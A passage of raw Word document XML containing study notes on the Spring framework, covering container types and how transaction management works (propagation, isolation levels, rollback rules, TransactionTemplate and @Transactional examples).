            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4389A551"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 Post Processors</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1297F0A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69F8743C"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allows custom logic before/after bean initialization)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00085CB4" w:rsidRPr="00085CB4" w14:paraId="4A2C91D4" w14:textId="77777777" w:rsidTr="00F40C68">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60E0096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ypical Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DD61C0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imple applications or resource-constrained environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69FDD6F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nterprise applications with complex requirements (AOP, events, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2AE3528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tainers in Spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE1B6B8"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ApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A generic, non-web Spring container for any application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072B9B19"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 For Java-based configuration (@Configuration classes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE9B113"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 For XML-based configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563AF912"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 For web-based applications (Spring MVC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F721935"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473DCEC9" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187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suitable for basic, lightweight use cases but lacks many features of the ApplicationContext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2932C844" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00CE4B95" w:rsidRDefault="00F40C68" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1877"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>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12" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6623B75C" w14:textId="48A4A83C" w:rsidR="00A930F5" w:rsidRPr="00CE4B95" w:rsidRDefault="00C92BC6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="456" w:name="_Toc197867670"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How transactions work in spring</w:t>
      </w:r>
      <w:r w:rsidR="00A930F5" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="456"/>
    </w:p>
    <w:p w14:paraId="29893B82" w14:textId="512F62A6" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E"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transactions</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Transaction Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BCB48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cepts of Spring Transaction Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32678C9F"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Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498A6BD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w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> represents a set of operations that should be treated as a unit, ensuring either all of them are committed or none of them are.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E587DF5"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llows you to define the transaction behavior (e.g., propagation, isolation, and timeout).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E5123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r</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F7DB1D"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provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transaction managers</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for different data sources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109D9DF0"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latformTransactionManager</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is the central interface for managing transactions in Spring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C0AEB9"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mplementations include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFB9AF7"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DataSourceTransactionManager</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For JDBC transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3274D291"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JpaTransactionManager</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For JPA transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BEE08A"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HibernateTransactionManager</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For Hibernate transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B8DC2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Propagation</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E1E191"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propagation defines how the transaction should behave in case there is already an existing transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459729A7"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propagation types include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5325CB6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D</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Join an existing transaction or create a new one if none exists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF9F3A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S_NEW</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Always create a new transaction, suspending any existing one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F06474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ESTED</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Execute within a nested transaction, which allows partial rollback.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEA6728"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UPPORTS</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Join an existing transaction if available; otherwise, execute non-transactionally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6184520E"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Isolation</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4CCBD6"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solation defines how the transaction is isolated from other transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1934A809"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solation levels include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141F2C33"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UNCOMMITTED</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows dirty reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEF6C95"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COMMITTED</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prevents dirty reads but allows non-repeatable reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E25519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PEATABLE_READ</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prevents dirty reads and non-repeatable reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B8EAC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IALIZABLE</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides the highest isolation, preventing all concurrency issues but reducing performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09146A21"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 Rules</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F383B8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allows specifying when to </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rollback</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the transaction. By default, Spring rolls back on unchecked exceptions (e.g., RuntimeException), but this behavior can be customized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B512F3E"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use the @Transactional annotation with the rollbackFor or noRollbackFor attributes to specify custom rollback rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548E3F27"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E1185E">
          <v:rect id="_x0000_i2113" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7019AF01"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Transaction Management in Spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245BB28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re are two primary ways to manage transactions in Spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDC8D94"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Programmatic Transaction Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64304ADE"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manually control the transaction using TransactionTemplate or PlatformTransactionManager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB51A44"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provides fine-grained control over transaction boundaries but is more verbose.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBD609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 xml:space="preserve"> (Programmatic Transaction Management with TransactionTemplate):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452F826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utowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAAABC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rivate PlatformTransactionManager transactionManager;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108D66B0" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BA91C8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Transaction() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B8D99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 transactionTemplate = new TransactionTemplate(transactionManager);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B80283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execute(status -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9355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y {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65438D5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B919F1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Example: update database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C910B7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7371096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atch (Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5281967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tatus.setRollbackOnly();  // Manually set rollback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5076575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e;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6701144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F73845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DA8DF4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28BD482"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Declarative Transaction Management (Recommended):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59644DFA"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e </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Transactional</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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utomatically handles the transaction creation, commit, or rollback based on the execution of the annotated method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2359D068"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70AE22">
          <v:rect id="_x0000_i2114" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="479CE2F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Transactional for Declarative Transaction Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BD39D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can be applied at the class or method level. When a method is annotated with @Transactional, Spring automatically wraps the method's execution in a transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E60A17B"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lastRenderedPageBreak/>
        <w:t>Basic Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1FC44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09B8998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09E788F2" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="127D73C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CF2DD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41DC8A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 (e.g., database operations)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A76FC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automatically manage the transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33781F9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260350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FDF133A"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Attributes of @Transactional:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF16F11"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ropagation</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines how the transaction should behave in case of existing transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483E8E3B"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solation</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines the level of isolation for the transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E349F9"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imeout</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies the maximum time a transaction can run before it is rolled back.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04999573"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Only</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Indicates whether the transaction is read-only (this can optimize certain operations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130714E7"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For / noRollbackFor</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies which exceptions should or should not trigger a rollback.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B9974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with Attributes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ECF22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7811C17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5C36E3A4" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40C7F17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propagation = Propagation.REQUIRED, isolation = Isolation.READ_COMMITTED, timeout = 30)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5186D80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D1ADCD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that should be managed as a transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A97CCF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3C9F394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36479C9"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Rollback Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A0E19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y default, Spring rolls back on RuntimeException and Error but not on checked exceptions. You can specify custom rollback behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FA77C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ransactional(rollbackFor = Exception.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D2E48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BusinessLogic() throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52966B1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Logic here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F97D701"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if (someCondition) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F20264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new Exception("This will trigger rollback");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F69D8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AA3646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94F2B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51BFA">
          <v:rect id="_x0000_i2115" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4B02B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How Transactions Work Internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B3AD74"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Start</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6511EA7E"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hen the method annotated with @Transactional is called, Spring starts a transaction. A new transaction is either created or joined based on the propagation setting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5DDC2F"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Commit</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD4E3F2"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fter the method executes successfully, the transaction is committed (the changes are saved to the database).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343991E8"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Rollback</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9F46B4"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 exception occurs (and it is a type that triggers a rollback), the transaction is rolled back, undoing any changes made within the scope of the transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C681D90"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rollback happens at the end of the method, and Spring ensures that no partial updates are committed to the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014303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9F268D">
          <v:rect id="_x0000_i2116" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F06F3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pring Transaction Management Example (with JPA):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE8793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5D7FE4B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UserService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E766A59" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FDA835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2CED847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UserRepository userRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0067D5" w14:textId="77777777" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
